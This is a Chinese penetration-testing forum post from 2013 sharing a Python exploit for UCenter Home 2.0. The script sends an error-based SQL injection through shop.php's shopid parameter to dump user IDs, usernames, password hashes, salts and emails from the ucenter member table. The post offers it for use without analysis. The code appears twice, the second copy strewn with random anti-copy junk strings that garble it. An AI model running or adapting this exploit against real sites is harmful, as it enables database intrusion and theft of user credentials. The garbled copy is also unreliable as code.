找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1948|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl  |1 |, F+ {) D% Y7 b; M3 a; R: Y
- L1 p! Q1 `# }

( n% `- N0 T  d0 _4 ?* x, }8 K5 a#!/usr/bin/env python  5 h! H& ]3 \0 A) G; D2 ^0 c
2 K0 P; x3 M- P# E9 l3 ~- x% ]  G
import sys  * p& v, Q: }9 M$ Q, s) `
import urllib2  
/ [% Q/ @1 E* j, G  R  E/ `import re  
# _1 S* u' W3 A$ Q! \ 0 B0 [5 d% I' n; Z# ]: B
def info():  " q4 Q! S9 B3 f1 O! Z6 u
    print 'From:http://www.exploit-db.com/exploits/14997/' # T2 \3 e! R, m9 e
    print 'http://www.hake.cc/Web_loudong/' & X- R& l# I, n: ~$ r
    print 'changed:qiaoy'  
4 x6 o( s& q6 t; `    print 'exp:'  ( q" e0 k% J# ]( ^3 W
    print ' ./UCenter_Home_2.0.py site'  
6 L& g6 L5 c$ O
7 X1 z2 @$ i) G6 P2 ]8 Sdef main():  
2 ]( i% \& E# v0 A" W2 z    if len(sys.argv) != 2:  
, X5 E4 e9 D( Q7 M, p0 i        info()  
  c+ T& Q, O! `2 _$ K0 z    else:  ' Y; o2 b& c3 @2 ], |3 t
        site = sys.argv[1]  0 `0 `; u9 {4 A9 ?0 f0 Y
        if site[0:7] == 'http://':  
/ H$ \3 H/ r2 h3 S* `7 x            sitesite =site  
" g) h: C5 S4 r3 z: W$ n* m( k        elif site[0:8] == 'https://':  7 H6 ~, ~5 P- C+ q$ X
            sitesite = site  
" M3 ?3 p1 g, F9 u" v& j        else:  0 z4 q$ j: C+ q7 d8 Y+ o
            site = 'http://'+site  5 e: a# b/ s* A0 I
        try:  1 C/ Y0 L: l. O# G
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  ( b( x3 l3 p5 }) e; t$ E- L
            Value = urllib2.urlopen(url).read()  $ {6 L9 @0 G4 L+ t* y" ~; Q2 g
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  ( G, A+ a; j. D9 i  J( E0 e
            hacked = Msg.split(':')  $ ?+ \1 G% \/ X" A
            print 'Name:    '+hacked[1]  
8 B2 a3 d5 F$ ^. ^/ g- [& W: f            print 'Passwd:  '+hacked[2]  
4 w8 E! `! ?& D* S$ E9 A            print 'salt:    '+hacked[3]  3 {2 j# W# w8 y: v' a1 h2 {: F
            print 'email:   '+hacked[4]  
8 n: x& Q, M0 \2 I4 a  k/ V        except:  & \3 t! i) u" x. Y4 |2 x
            print 'Sorry,I can\'t work............'  8 R$ X3 c6 f4 ?1 R; J$ T
& E4 ]4 ]6 B7 u( b  {
if __name__ == '__main__':  
5 \$ U0 n4 A5 y5 K3 u0 i. S    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表